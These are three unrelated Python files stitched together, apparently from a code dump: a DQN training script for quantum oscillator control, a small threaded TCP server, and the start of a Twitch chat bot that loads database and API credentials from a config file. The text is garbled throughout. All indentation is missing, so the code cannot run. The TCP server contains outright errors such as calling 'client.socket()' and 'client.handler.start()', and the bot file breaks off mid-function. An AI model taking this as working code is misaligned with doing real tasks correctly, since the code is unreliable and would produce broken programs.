import fnmatch
import argparse
from multiprocessing.sharedctypes import Value, RawValue
#import matplotlib.animation as animation
# the commandline arguments are detailed in "arguments.py" because there are too many
from arguments import args
torch.cuda.set_device(args.gpu_id)
torch.set_num_threads(1) # this is for CPU usage
if args.seed != -1:
random.seed(args.seed); torch.manual_seed(args.seed); np.random.seed(args.seed)
args.omega = 1.
################################### x space (for visulization)
x_max = 14.; x_n = 250
x = np.linspace(-x_max,x_max,x_n, dtype=np.float64)
################################### x space end
################################### wave function and energy
omega = args.omega * pi # this is the energy multiplier for the phonon numbers,
# in units of time^{-1} or \omega_c
gamma = args.gamma * pi
n_max = args.n_max
def probability(state):
return np.real(np.conj(state)*state)
def common_factor_of_1Dharmonics(n):
return 1./np.sqrt(np.float128(repr(2**n))*np.float128(repr(factorial(n)))) * sqrt(sqrt(1./pi)) * np.exp((-x*x/2).astype(np.float128))
def adjust_n_max(new_n_max):
global n_max
n_max = new_n_max
global n_phonon
n_phonon=np.array([i for i in range(n_max+1)],dtype=np.float64)
global sqrt_n
sqrt_n = np.array([sqrt(i) for i in range(1,n_max+1)])
global annihilation, creation
annihilation=csr(np.diag(sqrt_n, k=1))
creation=csr(np.diag(sqrt_n, k=-1))
annihilation.prune(); creation.prune()
global x_hat, p_hat ### we assume \hbar = m * \omega = 1
x_hat = sqrt(1/2)*(creation + annihilation)
p_hat = 1.j*sqrt(1/2)*(creation - annihilation)
x_hat.prune(); p_hat.prune()
global x_hat_2, p_hat_2, xp_px_hat
x_hat_2 = x_hat.dot(x_hat); p_hat_2 = np.real(p_hat.dot(p_hat))
xp_px_hat = x_hat.dot(p_hat)+p_hat.dot(x_hat)
x_hat_2.prune(); p_hat_2.prune(); xp_px_hat.prune()
global harmonic_Hamil
harmonic_Hamil = omega *np.diag(1/2 + n_phonon)
harmonic_Hamil = csr(harmonic_Hamil)
harmonic_Hamil.prune()
if __name__ == '__main__':
print('n_max adjusted to {}'.format(new_n_max))
global eigen_states
eigen_states=[]
for i in range(new_n_max + 1):
eigen_states.append(common_factor_of_1Dharmonics(i)*np.polynomial.hermite.hermval(x.astype(np.float128, order='C'), np.array([0. for j in range(i)]+[1.],dtype=np.float128)))
eigen_states=np.array(eigen_states).transpose().astype(np.float64, order='C')
def normalize(vector):
p=linalg.norm(vector)
return vector / p
def phonon_number(state):
return np.sum(probability(state)*n_phonon)
def x_expct(state):
return np.real(np.conj(state).dot(x_hat.dot(state)))
def p_expct(state):
return np.real(np.conj(state).dot(p_hat.dot(state)))
def expct(state, hermitian_operator):
return np.real(np.conj(state).dot(hermitian_operator.dot(state)))
def spatial_repr(state):
mask = np.abs(state) > 1e-4 # only values that are larger than this threshold are displayed
return eigen_states[:, :state.size][:, mask].dot(state[ mask ])
if __name__ != '__main__':
adjust_n_max(n_max)
################################### wave function and energy end
################################## start learning setting, including some other settings not present in the commandline arguments
half_period_steps = args.time_steps
time_step = 1 / half_period_steps
controls_per_half_period = args.n_con
assert half_period_steps % controls_per_half_period == 0, 'We require that time_steps {} to be fully divided by the number of control steps n_con {}.'.format(args.time_steps, args.n_con)
control_interval = round(half_period_steps / controls_per_half_period)
num_of_episodes = args.num_of_episodes
reward_multiply = args.reward_scale_up
t_max = 100.
num_of_saves = args.num_of_saves
# data input for the neural network
def get_data_xp(state):
x_expc, p_expc = x_expct(state), p_expct(state)
return np.array([x_expc, p_expc, expct(state, x_hat_2)-x_expc**2, expct(state, p_hat_2)-p_expc**2, expct(state, xp_px_hat)/2-x_expc*p_expc]).astype(np.float32)
def get_data_wavefunction(state):
# the last five values at the highest levels are supposed negligible and we do not include them as input data for AI
return np.hstack((np.real(state[:-10]),np.imag(state[:-10]))).astype(np.float32)
if args.input == 'xp':
data_size = 5
get_data = get_data_xp # get_data is the function that returns the input data for AI given a quantum state
elif args.input == 'wavefunction':
data_size = 2*(n_max+1-10)
get_data = get_data_wavefunction
elif args.input == 'measurements':
n_periods_to_read = 1.5
num_of_data_per_time_unit = 360*4
assert half_period_steps % num_of_data_per_time_unit == 0, 'We require that time_steps {} to be fully divided by the 1440, which is the number of collected measurement outcomes per time 1.'.format(args.time_steps)
coarse_grain = half_period_steps//num_of_data_per_time_unit
read_length = round(n_periods_to_read * 2 * num_of_data_per_time_unit) # 3600
read_control_step_length = control_interval//coarse_grain
data_size = 2 * read_length
shape_measurement_data = (2, read_length)
# we do not plot when we do parallelized computation
#import plot
#plot.set_parameters(x=x, x_max=x_max, dt=time_step, num_of_episodes=num_of_episodes, probability=probability,
# reward_multiply=reward_multiply, read_length=read_length, controls_per_half_period=controls_per_half_period)
# set the reinforcement learning settings
if __name__ == '__main__':
import RL
RL.set_parameters(control_interval=control_interval, t_max=t_max, F_max=args.F_max)
if args.input == 'measurements': RL.set_parameters(read_step_length=read_control_step_length)
################################## end learning setting
# Below is the worker function for subprocesses, which carries out the control simulations and pushes the experiences and records to queues that are collected and handled by other processes. (Quantum simulation is implemented in a compiled C module)
# Because too many processes using CUDA will occupy a huge amount of GPU memory, we avoid using CUDA in these workers. Instead, these workers ask a manager process when they want to evaluate the neural network, and only the manager process is allowed to use CUDA to evaluate the neural network for the controls.
def Control(net, pipes, shared_buffer, seed, idx):
simulation = __import__('simulation')
# seeding
random.seed(seed)
np.random.seed(seed)
simulation.set_seed(seed)
# preparing pipes
MemoryQueue, ResultsQueue, ActionPipe, EndEvent, PauseEvent = pipes
state_data_to_manager = np.frombuffer(shared_buffer,dtype='float32')
if args.input=='measurements': state_data_to_manager = state_data_to_manager.reshape(shape_measurement_data)
# random action decision hyperparameters
EPS_START = 0.05
EPS_END = 0.0002
EPS_DECAY = args.n_con*t_max*60
# initialization
steps_done = 0
no_action_choice = net.num_of_control_resolution_oneside
def call_force(data):
nonlocal steps_done
# if LQG control is used, immediately return the LQG control without evaluating the neural network.
if args.LQG:
x=data[0]; p=data[1]
rnd = False
dt = 1./controls_per_half_period
force_max = net.convert_to_force(2*no_action_choice)
F = - ((x+p)+(p-x)*omega*dt)/dt
force = F / omega
force = min(force, force_max)
force = max(force, -force_max)
force = round(force/(force_max/no_action_choice))
force = float(force*(force_max/no_action_choice))
return force, round(force/(force_max/no_action_choice))+no_action_choice, False
# apply an \epsilon-greedy strategy:
eps_threshold = (EPS_START-EPS_END) * exp(-1. * steps_done / EPS_DECAY)
eps_threshold += EPS_END
steps_done += args.num_of_actors # this approximates the total steps_done of all the actors
if random.random() < eps_threshold and not args.test:
last_action=random.randrange(no_action_choice*2+1)
rnd = True
else:
# copy data to
state_data_to_manager[:]=data
while ActionPipe.poll(): ActionPipe.recv() # ensure that no data remain in the recv pipe
ActionPipe.send(idx)
last_action = ActionPipe.recv()
rnd = False
force = net.convert_to_force(last_action)
return force, last_action, rnd
# do one episode
def do_episode():
t = 0.
to_stop = False
# prepare the quantum state
state = np.zeros((n_max+1,), dtype=np.complex128)
state[0]=1.
# force is the parameter before -\omega\hat{x}, which is the physical force divided by an omega factor
force = 0.
last_action = no_action_choice
# start the simulation loop
i = 0
experience = []
accu_energy = 0.; accu_counter = 0
if args.input!='measurements':
last_data = get_data(state)*args.input_scaling
while not t >= t_max:
if i % control_interval == 0 and i != 0:
phonon = phonon_number(state)
if not to_stop and phonon <= args.phonon_cutoff:
data = get_data(state)*args.input_scaling
if args.train and i!=control_interval:
experience.append(np.hstack(( last_data, data,
np.array([last_action],dtype=np.float32),
np.array([-(phonon)*reward_multiply],dtype=np.float32) )) )
else: break
if t>30:
accu_energy += phonon_number(state); accu_counter += 1
if (not args.LQG) or args.input=='xp':
force, last_action, rnd = call_force(data)
else: force, last_action, rnd = call_force(get_data_xp(state))
last_data = data
q, x_mean, Fail = simulation.step(state, time_step, force, gamma)
i += 1
# to_stop tiggers the stop when it attempts to store experience
if Fail and not to_stop : to_stop = True
t += time_step
# the organization of measurement data needs to be different:
else:
measurements_cache = []; measurements_input = list(np.zeros(read_length))
forces_along_measurements_input = list(np.zeros(read_length)); forces_to_store = list(np.zeros(read_length//read_control_step_length))
while not t >= t_max-0.01*time_step:
if i % control_interval == 0 and i != 0:
phonon = phonon_number(state)
if not to_stop and phonon <= args.phonon_cutoff:
forces_to_store.append(force*args.input_scaling)
# store the experience as a continuous measurement sequence connecting two neighbouring control steps
if args.train and i!=control_interval:
experience.append(np.hstack(( np.array(measurements_input, dtype=np.float32)[::-1],
np.array(forces_to_store, dtype=np.float32)[::-1],
np.array([last_action], dtype=np.float32),
np.array([-(phonon)*reward_multiply],dtype=np.float32) )) )
else: break
if t>30-0.01*time_step:
accu_energy += phonon_number(state); accu_counter += 1
# organise the lists to discard measurement data that belong to the most distant control step in the past
measurements_input, forces_along_measurements_input = measurements_input[read_control_step_length:], forces_along_measurements_input[read_control_step_length:]
forces_to_store = forces_to_store[1:]
# use the organised measurement data to compute the next control
if (not args.LQG):
force, last_action, rnd = call_force([measurements_input[::-1], forces_along_measurements_input[::-1]])
else: force, last_action, rnd = call_force(get_data_xp(state))
q, x_mean, Fail=simulation.step(state, time_step, force, gamma)
measurements_cache.append(q)
if len(measurements_cache)==coarse_grain:
measurements_input.append(sum(measurements_cache)/coarse_grain*args.input_scaling)
measurements_cache.clear()
forces_along_measurements_input.append(force*args.input_scaling)
i += 1
# to_stop tiggers stop when it stores experience
if Fail and not to_stop : to_stop = True
t += time_step
# push experience into the main process and push results to the manager
if t>= t_max-0.01*time_step: t=t_max
avg_phonon = accu_energy/accu_counter if t==t_max else args.phonon_cutoff
if not EndEvent.is_set():
MemoryQueue.put( (experience, t, avg_phonon) )
ResultsQueue.put((t, avg_phonon))
return avg_phonon
while True:
# whether to end the program
if EndEvent.is_set():
break
do_episode()
while PauseEvent.is_set():
time.sleep(1.)
# to avoid an endless loop
if EndEvent.is_set():
break
while ActionPipe.poll(): ActionPipe.recv() # ensure that no data remain in the recv pipe
ActionPipe.send(None) # tell the manager that the worker has ended
return
# the manager process for workers. It is used to organise all neural network evaluations into one single process in order to save GPU memory.
# It also monitors the current performance and saves the models.
def worker_manager(net, pipes, num_of_processes, seed, others):
# initialize
MemoryQueue, ActorPipe, EndEvent, PauseEvent = pipes
random.seed(seed)
torch.manual_seed(seed)
torch.set_grad_enabled(False)
# prepare the path
if not os.path.isdir(args.folder_name): os.makedirs(args.folder_name, exist_ok=True)
if args.write_training_data and args.train:
if os.path.isfile(args.folder_name + '.txt'): os.remove(args.folder_name + '.txt')
# prepare workers
import multiprocessing as mp
from multiprocessing.sharedctypes import RawArray
fork = mp.get_context('forkserver')
results_queue = fork.Manager().Queue()
processes = []
message_conn = []; message_worker_conn = []
worker_data = []
for n in range(num_of_processes):
conn1, conn2 = fork.Pipe(True)
message_conn.append(conn1); message_worker_conn.append(conn2)
shared_buffer = RawArray('f', data_size)
np_memory = np.frombuffer(shared_buffer,dtype='float32')
if args.input=='measurements':
np_memory=np_memory.reshape(shape_measurement_data)
worker_data.append(torch.from_numpy(np_memory))
seed = random.randrange(0,99999)
processes.append( fork.Process( target=Control, args=(copy.deepcopy(net).cpu(), (MemoryQueue, results_queue, conn2, EndEvent, PauseEvent), shared_buffer, seed, n) ) )
net=net.cuda()
net.eval()
# prepare to save
good_actors=[(args.phonon_cutoff,0.) for i in range(num_of_saves)]
simulated_oscillations = 0.
performances = []
episode_passed = 0
# when receiving a net, check whether the previous net should be stored
def receive_net():
if args.test or args.LQG:
if not results_queue.empty():
while not results_queue.empty():
result = results_queue.get()
performances.append(result[1])
with open(os.path.join(args.folder_name, others+'_record.txt'),'a') as f:
f.write('{}\n'.format(result[1]))
return
if ActorPipe.poll():
nonlocal net
if not results_queue.empty():
nonlocal episode_passed, simulated_oscillations
while not results_queue.empty():
result = results_queue.get()
simulated_oscillations += result[0]/2.
performances.append(result[1]) # get the avg_phonon in the result tuple
episode_passed += 1
if args.write_training_data:
with open(args.folder_name + '.txt','a') as f:
f.write('{}, {}\n'.format(simulated_oscillations, result[1]))
# only if 50 additional episodes have passed, do we consider saving the next model
if episode_passed > 50 and len(performances) >= 9:
new_avg_phonon = np.mean(np.array(performances[-10:]))
if new_avg_phonon < good_actors[-1][0]:
good_actors[-1] = (new_avg_phonon, copy.deepcopy(net).cpu())
good_actors.sort(key=lambda p: p[0], reverse=False) # sort in increasing order; "reverse" is False, in fact unnecessary
print(colored('new avg phonon record: {:.5f}'.format(new_avg_phonon), 'green',attrs=['bold']))
for idx, actor in enumerate(good_actors):
if type(actor[1]) != float:
torch.save(actor[1].state_dict(), os.path.join(args.folder_name,'{}.pth'.format(idx+1)))
existing_record_name = os.path.join(args.folder_name,'{}_record.txt'.format(idx+1))
if os.path.isfile(existing_record_name): os.remove(existing_record_name)
episode_passed = 0
performances.clear()
net.load_state_dict(ActorPipe.recv())
while ActorPipe.poll():
net.load_state_dict(ActorPipe.recv())
net = net.cuda()
net.eval()
if args.show_actor_recv: print(colored('new model received', 'yellow'))
if args.input != 'measurements':
network_input = torch.empty((num_of_processes,data_size), device='cuda')
else: network_input = torch.empty((num_of_processes,2,read_length), device='cuda')
for proc in processes:
proc.start()
process_ended = 0
while process_ended!=num_of_processes:
# receive network input data (confirm that there are data, and copy them from the shared buffer to GPU)
num_of_data = 0
data_received_id = []
for i in range(num_of_processes):
if message_conn[i].poll():
idx=message_conn[i].recv()
if idx!=None:
data_received_id.append(idx) # the data sent through pipe is exactly the id
network_input[num_of_data]=worker_data[i]
num_of_data += 1
else: process_ended += 1
while message_conn[i].poll(): # For safety; when False, this while loop is ignored
message_conn[i].recv()
# process the received data
if num_of_data == 0:
time.sleep(0.0005) # if no data, wait for 0.5 milisecond
if args.LQG: time.sleep(1.)
else:
action_values, avg_value, _noise = net(network_input[:num_of_data,:])
actions = action_values.max(1)[1].cpu()
for i,idx in enumerate(data_received_id):
message_conn[idx].send(actions[i].item())
# update the network
receive_net()
# end, if have left the while loop
if args.test or args.LQG:
with open(os.path.join(args.folder_name, others+'.txt'),'w') as f:
performances = np.array(performances)
f.write('{} +- {}\n'.format(np.mean(performances), np.std(performances, ddof=1)/np.sqrt(len(performances)) ))
for proc in processes:
proc.join()
if __name__ == '__main__':
class Main_System(object):
# the Main_System does not need to keep a copy of network
# only the copy of network inside TrainDQN class is modified by training, so we pass its state_dict to subprocesses
def __init__(self, train, num_of_processes, others=''):
self.train = train
self.processes = []
self.actor_update_time = 10.
self.lr_step = 0
self.pending_training_updates = Value('d',0.,lock=True)
# somehow RawValue also needs us to call ".value", otherwise it says the type is c_double or c_int
self.episode = RawValue('i',0)
self.t_done = Value('d',0.,lock=True)
self.last_achieved_time = RawValue('d',0.)
# set the data going to subprocesses:
self.train.memory.start_proxy_process((self.pending_training_updates, self.episode, self.t_done, self.last_achieved_time), self.train.transitions_storage, (self.train.batch_size, self.train.memory.tree.data_size))
# the following will create threads, which not end and cause error (not exiting)
spawn=mp.get_context('spawn')
self.manager = spawn.Manager()
self.MemoryInputQueue = self.manager.Queue()
self.end_event = self.manager.Event()
self.pause_event = self.manager.Event()
self.learning_in_progress_event = self.manager.Event()
# actors
self.ActorReceivePipe, self.ActorUpdatePipe = spawn.Pipe(False) # unidirectional pipe that send message from conn2 to conn1
seed = random.randrange(0,9999999)
self.worker_manager = spawn.Process( target=worker_manager, args=(copy.deepcopy(train.net).cpu(), (self.MemoryInputQueue, self.ActorReceivePipe, self.end_event, self.pause_event), num_of_processes, seed, others) )
# store and manage experience (including updating priority and potentially sampling out replays)
# all the arguments passed into it are used (**by fork initialization in RL module**).
# somehow RawValue also needs us to call ".value" ? Otherwise it says the type is c_double / c_int
self.train.memory.set_memory_source(self.MemoryInputQueue, (self.pause_event, self.end_event, self.learning_in_progress_event))
self.backup_period = self.train.backup_period
def __call__(self, num_of_episodes):
started = False
self.worker_manager.start()
last_time = time.time()
last_idle_time = 0.
updates_done = 0.
# We assume batch_size is 256 and each experience is learned 8 times in RL.py, and when we change, we use the rescaling factor below to implement.
# If we disable training, we use 'inf' instead to make the condition of training always False.
downscaling_of_default_num_updates = (8./args.n_times_per_sample)*(args.batch_size/256.) if args.train else float('inf')
while self.episode.value < num_of_episodes or (self.episode.value < args.maximum_trails_before_giveup and not self.learning_in_progress_event.is_set()):
something_done = False # check whether nothing is done in one event loop
remaining_updates = self.pending_training_updates.value - updates_done
if remaining_updates >= 1. *downscaling_of_default_num_updates:
if remaining_updates >= 150. *downscaling_of_default_num_updates and not self.pause_event.is_set():
self.pause_event.set(); print('Wait for training')
loss = self.train()
# if we parallelize the training as a separate process, the following block should be deleted
if loss!=None:
updates_done += 1.*downscaling_of_default_num_updates
something_done = True # one training step is done
if not started: started = True
# to reduce the frequency of calling "get_lock()", we only periodically reset the shared data "pending_training_updates"
if updates_done >= 200.*downscaling_of_default_num_updates or self.pause_event.is_set():
with self.pending_training_updates.get_lock():
self.pending_training_updates.value -= updates_done
updates_done = 0.
if remaining_updates < 50. *downscaling_of_default_num_updates and self.pause_event.is_set():
self.pause_event.clear()
if self.t_done.value >= self.actor_update_time:
self.scale_up_actor_update_time(self.last_achieved_time.value)
if not self.ActorReceivePipe.poll() and started and not args.LQG:
self.ActorUpdatePipe.send(self.train.net.state_dict())
with self.t_done.get_lock():
self.t_done.value = 0.
something_done = True
if something_done:
# print out how much time the training process has been idle for
if last_idle_time != 0. and time.time() - last_time > 40.:
print('trainer pending for {:.1f} seconds out of {:.1f}'.format(last_idle_time, time.time() - last_time))
last_idle_time = 0.
last_time = time.time()
# if nothing is done, wait.
if not something_done: time.sleep(0.01); last_idle_time += 0.01
self.adjust_learning_rate()
self.end_event.set()
self.worker_manager.join()
return
def scale_up_actor_update_time(self, achieved_time):
changed = False
if achieved_time>80. and self.actor_update_time<=150.:
self.actor_update_time = 1000.; changed = True
elif achieved_time>20. and self.actor_update_time<=50.:
self.actor_update_time = 150.; changed = True
elif achieved_time>10. and self.actor_update_time<=25.:
self.actor_update_time = 50.; changed = True
elif achieved_time>5. and self.actor_update_time<=10.:
self.actor_update_time = 25.; changed = True
if changed and args.train: print('actor_update_time adjusted to {:.1f}'.format(self.actor_update_time))
def adjust_learning_rate(self):
# the learning rate schedule is written in "arguments.py"
if self.episode.value > args.lr_schedule[self.lr_step][0] and self.last_achieved_time.value == t_max:
args.lr = min(args.lr_schedule[self.lr_step][1], args.lr)
self.lr_step += 1
if args.train:
for param_group in self.train.optim.param_groups: param_group['lr'] = args.lr
print(colored('learning rate set to {:.2g}'.format(args.lr),attrs=['bold']))
# system settings, checks and the framework
def check_C_module_and_compile():
if args.compile == False:
try:
simulation = __import__('simulation')
(compiled_n_max, compiled_omega) = simulation.check_settings()
if compiled_n_max != n_max:
print(colored('N_MAX of the existing C module ({}) does not match the current task ({}). Recompile.\n'.format(compiled_n_max, n_max), 'yellow',attrs=['bold']))
time.sleep(1)
args.compile = True
elif compiled_omega != omega:
print(colored('\omega of the existing C module ({}) does not match the current task ({}). Recompile.\n'.format(compiled_omega, omega), 'yellow',attrs=['bold']))
time.sleep(1)
args.compile = True
except (ModuleNotFoundError, AttributeError) as e:
args.compile = True
if args.compile == True:
code=os.system('python{} setupC.py --n_max {} --omega {} --gamma {}'.format(sys.version[:3], n_max, omega, gamma))
if code != 0:
raise RuntimeError('Compilation Failure')
if __name__ == '__main__':
time_of_start = time.time()
# set the title of the terminal so that what the terminal is doing is clear
print('\33]0;{}\a'.format(' '.join(sys.argv)), end='', flush=True)
print(args)
# compile the simulation module in C
check_C_module_and_compile()
# set the replay memory
capacity = round(args.size_of_replay_memory*controls_per_half_period*t_max) if args.train else 1
memory = RL.Memory(capacity = capacity, data_size = data_size * 2 + 2 if args.input != 'measurements' else \
(read_control_step_length+read_length) + read_length//read_control_step_length+1 + 2,
policy = 'random', passes_before_random = 0.2)
# define the neural network
net = RL.direct_DQN(data_size).cuda() if args.input != 'measurements' else RL.DQN_measurement(read_length)
# set the task
if args.train or args.LQG:
train = RL.TrainDQN(net, memory, batch_size = args.batch_size, gamma=0.99, backup_period = args.target_network_update_interval, args=args)
del net
# the main function of training
if args.train:
main = Main_System(train, num_of_processes=args.num_of_actors)
main(num_of_episodes)
# when we do not train and we test the result of LQG
elif args.LQG:
main = Main_System(train, num_of_processes=args.num_of_actors, others='LQG')
main(args.num_of_test_episodes)
# if we test existing models, we use a loop to iterate over the models
else:
# find all models to test that end with no extension or '.pth' in the given directory
import glob
test_nets = []
for name in glob.glob(os.path.join(args.folder_name,'*')):
file_name, ext = os.path.splitext(os.path.basename(name))
if (ext=='.pth' or ext=='') and os.path.isfile(name): test_nets.append((file_name, torch.load(name)))
assert len(test_nets)!=0, 'No model found to test'
from utilities import isfloat, isint
test_nets = sorted([t for t in test_nets if isfloat(t[0])], key = lambda t: float(t[0])) + sorted([t for t in test_nets if not isfloat(t[0])])
# for each model we run the main loop once
for test_net in test_nets:
if test_net[1].__class__ == RL.direct_DQN: net.load_state_dict(test_net[1].state_dict())
else: net.load_state_dict(test_net[1])
train = RL.TrainDQN(net, memory, batch_size = args.batch_size, gamma=0.99, backup_period = args.target_network_update_interval, args=args)
main = Main_System(train, num_of_processes=args.num_of_actors, others=test_net[0])
main(args.num_of_test_episodes)
del net
# organize all test results into one file
with open(os.path.join(args.folder_name,'test_result.txt'),'w') as test_result:
for test_net in test_nets:
with open(os.path.join(args.folder_name,test_net[0]+'.txt')) as f:
result = f.readline()
test_result.write('{}:\t'.format(test_net[0])+result)
print('{}:\t'.format(test_net[0])+result, end='')
os.remove(os.path.join(args.folder_name,test_net[0]+'.txt'))
del main
del memory
from timer import print_elapsed_time
print_elapsed_time(time_of_start)
|
tcp_server.py | import socket
import threading
bind_ip = "0.0.0.0"
bind_port = 9999
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bind_ip, bind_port))
server.listen(5)
print(f"[*] Listening on {bind_ip}, {bind_port}")
#client handling thread
def handle_client(client_socket):
"""Print out what the clients send
"""
request = client_socket.recv(1024)
print(f"[*] Received {request}")
#send back a packet
client_socket.send(b"ACKK!")
print(client_socket.getpeername())
client.socket()
while True:
client, addr = server.accept()
print(f"[*] Accepted connection from {addr[0]}, {addr[1]} ")
#spin up our client thread to handle incoming data
client_handler = threading.Thread(target=handle_client, args=(client,))
client.handler.start() |
main.py | #!/usr/bin/python3
# coding=utf-8
import pymysql
import pydle
import random
from random import choice
import datetime
import time
from threading import Timer, Thread
import urllib.request
import requests
import json
import threading
import math
import functools
from string import ascii_letters
from collections import defaultdict, OrderedDict
from private_functions import validateWaifuURL, processWaifuURL, validateBadgeURL, processBadgeURL, tokenGachaRoll
import sys
import re
import logging
import base64
import websocket
import _thread as thread
formatter = logging.Formatter('[%(asctime)s][%(name)s][%(levelname)s] %(message)s')
logger = logging.getLogger('nepbot')
logger.setLevel(logging.DEBUG)
logger.propagate = False
fh = logging.handlers.TimedRotatingFileHandler('debug.log', when='midnight', encoding='utf-8')
fh.setLevel(logging.DEBUG)
ch = logging.StreamHandler(sys.stdout)
ch.setLevel(logging.INFO)
fh.setFormatter(formatter)
ch.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(ch)
logging.getLogger('tornado.application').addHandler(fh)
logging.getLogger('tornado.application').addHandler(ch)
ffzws = 'wss://andknuckles.frankerfacez.com'
pool = pydle.ClientPool()
current_milli_time = lambda: int(round(time.time() * 1000))
pymysql.install_as_MySQLdb()
dbpw = None
dbname = None
dbhost = None
dbuser = None
silence = False
debugMode = False
streamlabsclient = None
twitchclientsecret = None
bannedWords = []
t = None
# read config values from file (db login etc)
try:
f = open("nepbot.cfg", "r")
lines = f.readlines()
for line in lines:
name, value = line.split("=", 1)
value = str(value).strip("\n")
logger.info("Reading config value '%s' = '<redacted>'", name)
if name == "dbpassword":
dbpw = value
if name == "database":
dbname = value
if name == "dbhost":
dbhost = value
if name == "dbuser":
dbuser = value
if name == "streamlabsclient":
streamlabsclient = value
if name == "twitchclientsecret":
twitchclientsecret = value
if name == "log":
logger.info("Setting new console log level to %s", value)
ch.setLevel(logging.getLevelName(value))
if name == "silent" and value == "True":
logger.warning("Silent mode enabled")
silence = True
if name == "debugMode" and value == "True":
logger.warning("Debug mode enabled, !as command is available")
debugMode = True
if name == "bannedWords":
bannedWords = [word.lower() for word in value.split(",")]
if dbpw is None:
logger.error("Database password not set. Please add it to the config file, with 'dbpassword=<pw>'")
sys.exit(1)
if dbname is None:
logger.error("Database name not set. Please add it to the config file, with 'database=<name>'")
sys.exit(1)
if dbhost is None:
logger.error("Database host not set. Please add it to the config file, with 'dbhost=<host>'")
sys.exit(1)
if dbuser is None:
logger.error("Database user not set. Please add it to the config file, with 'dbuser=<user>'")
sys.exit(1)
if twitchclientsecret is None:
logger.error("Twitch Client Secret not set. Please add it to the conig file, with 'twitchclientsecret=<pw>'")
sys.exit(1)
f.close()
except Exception:
logger.error("Error reading config file (nepbot.cfg), aborting.")
sys.exit(1)
db = pymysql.connect(host=dbhost, user=dbuser, passwd=dbpw, db=dbname, autocommit="True", charset="utf8mb4")
admins = []
superadmins = []
activitymap = {}
marathonActivityMap = {}
blacklist = []
config = {}
packAmountRewards = {}
emotewaremotes = []
revrarity = {}
visiblepacks = ""
validalertconfigvalues = []
discordhooks = []
cpuVoters = []
busyLock = threading.Lock()
discordLock = threading.Lock()
streamlabsLock = threading.Lock()
streamlabsauthurl = "https://www.streamlabs.com/api/v1.0/authorize?client_id=" + streamlabsclient + "&redirect_uri=https://marenthyu.de/cgi-bin/waifucallback.cgi&response_type=code&scope=alerts.create&state="
streamlabsalerturl = "https://streamlabs.com/api/v1.0/alerts"
alertheaders = {"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"}
time_regex = re.compile('(?P<hours>[0-9]*):(?P<minutes>[0-9]{2}):(?P<seconds>[0-9]{2})([\.:](?P<ms>[0-9]{1,3}))?')
waifu_regex = None
def loadConfig():
global revrarity, blacklist, visiblepacks, admins, superadmins, validalertconfigvalues, waifu_regex, emotewaremotes, discordhooks, packAmountRewards
with db.cursor() as curg:
curg.execute("SELECT * FROM config")
logger.info("Importing config from database")
for row in curg.fetchall():
config[row[0]] = row[1]
logger.debug("Config: %s", str(config))
if int(config["emoteWarStatus"]) == 1:
# emote war active, get its emotes
curg.execute("SELECT name FROM emoteWar")
emotewaremotes = [row[0] for row in curg.fetchall()]
else:
emotewaremotes = []
alertRarityRange = range(int(config["drawAlertMinimumRarity"]), int(config["numNormalRarities"]))
validalertconfigvalues = ["color", "alertChannel", "defaultLength", "defaultSound", "setClaimSound",
"setClaimLength"] \
+ ["rarity%dLength" % rarity for rarity in alertRarityRange] \
+ ["rarity%dSound" % rarity for rarity in alertRarityRange]
waifu_regex = re.compile('(\[(?P<id>[0-9]+?)])?(?P<name>.+?) *- *(?P<series>.+) *- *(?P<rarity>[0-' + str(
int(config["numNormalRarities"]) + int(config["numSpecialRarities"]) - 1) + ']) *- *(?P<link>.+?)$')
logger.debug("Alert config values: %s", str(validalertconfigvalues))
logger.debug("Waifu regex: %s", str(waifu_regex))
logger.info("Fetching admin list...")
curg.execute("SELECT name, super FROM admins")
admins = []
superadmins = []
for row in curg.fetchall():
admins.append(row[0])
if row[1] != 0:
superadmins.append(row[0])
logger.debug("Admins: %s", str(admins))
logger.debug("SuperAdmins: %s", str(superadmins))
revrarity = {config["rarity" + str(i) + "Name"]: i for i in
range(int(config["numNormalRarities"]) + int(config["numSpecialRarities"]))}
curg.execute("SELECT id FROM banned_users WHERE banned = 1")
blacklist = [int(row[0]) for row in curg.fetchall()]
# visible packs
curg.execute("SELECT name FROM boosters WHERE listed = 1 AND buyable = 1 ORDER BY sortIndex ASC")
packrows = curg.fetchall()
visiblepacks = "/".join(row[0] for row in packrows)
# discord hooks
with discordLock:
curg.execute("SELECT url FROM discordHooks ORDER BY priority DESC")
discrows = curg.fetchall()
discordhooks = [row[0] for row in discrows]
# pack amount rewards
packAmountRewards = {}
curg.execute("SELECT boostername, de_amount, reward_booster FROM pack_amount_rewards")
rewardRows = curg.fetchall()
for row in rewardRows:
if row[0] not in packAmountRewards:
packAmountRewards[row[0]] = {}
packAmountRewards[row[0]][int(row[1])] = row[2]
def checkAndRenewAppAccessToken():
global config, headers
krakenHeaders = {"Authorization": "OAuth %s" % config["appAccessToken"], "Accept": "application/vnd.twitchtv.v5+json"}
r = requests.get("https://api.twitch.tv/kraken", headers=krakenHeaders)
resp = r.json()
if "token" not in resp or "valid" not in resp["token"] or not resp["token"]["valid"]:
# app access token has expired, get a new one
logger.debug("Requesting new token")
url = 'https://id.twitch.tv/oauth2/token?client_id=%s&client_secret=%s&grant_type=client_credentials' % (
config["clientID"], twitchclientsecret)
r = requests.post(url)
try:
jsondata = r.json()
if 'access_token' not in jsondata or 'expires_in' not in jsondata:
raise ValueError("Invalid Twitch API response, can't get an app access token.")
config["appAccessToken"] = jsondata['access_token']
logger.debug("request done")
cur = db.cursor()
cur.execute("UPDATE config SET value = %s WHERE name = 'appAccessToken'", [jsondata['access_token']])
cur.close()
headers = {"Authorization": "Bearer %s" % config["appAccessToken"], "Client-ID": config["clientID"]}
except ValueError as error:
logger.error("Access Token renew/get request was not successful")
raise error
def booleanConfig(name):
return name in config and config[name].strip().lower() not in ["off", "no", "false"]
def placeBet(channel, userid, betms):
cur = db.cursor()
cur.execute("SELECT id FROM bets WHERE channel = %s AND status = 'open' LIMIT 1", [channel])
row = cur.fetchone()
if row is None:
cur.close()
return False
cur.execute("REPLACE INTO placed_bets (betid, userid, bet, updated) VALUE (%s, %s, %s, %s)",
[row[0], userid, betms, current_milli_time()])
cur.close()
return True
def endBet(channel):
# find started bet data
cur = db.cursor()
cur.execute("SELECT id FROM bets WHERE channel = %s AND status = 'started' LIMIT 1", [channel])
row = cur.fetchone()
if row is None:
cur.close()
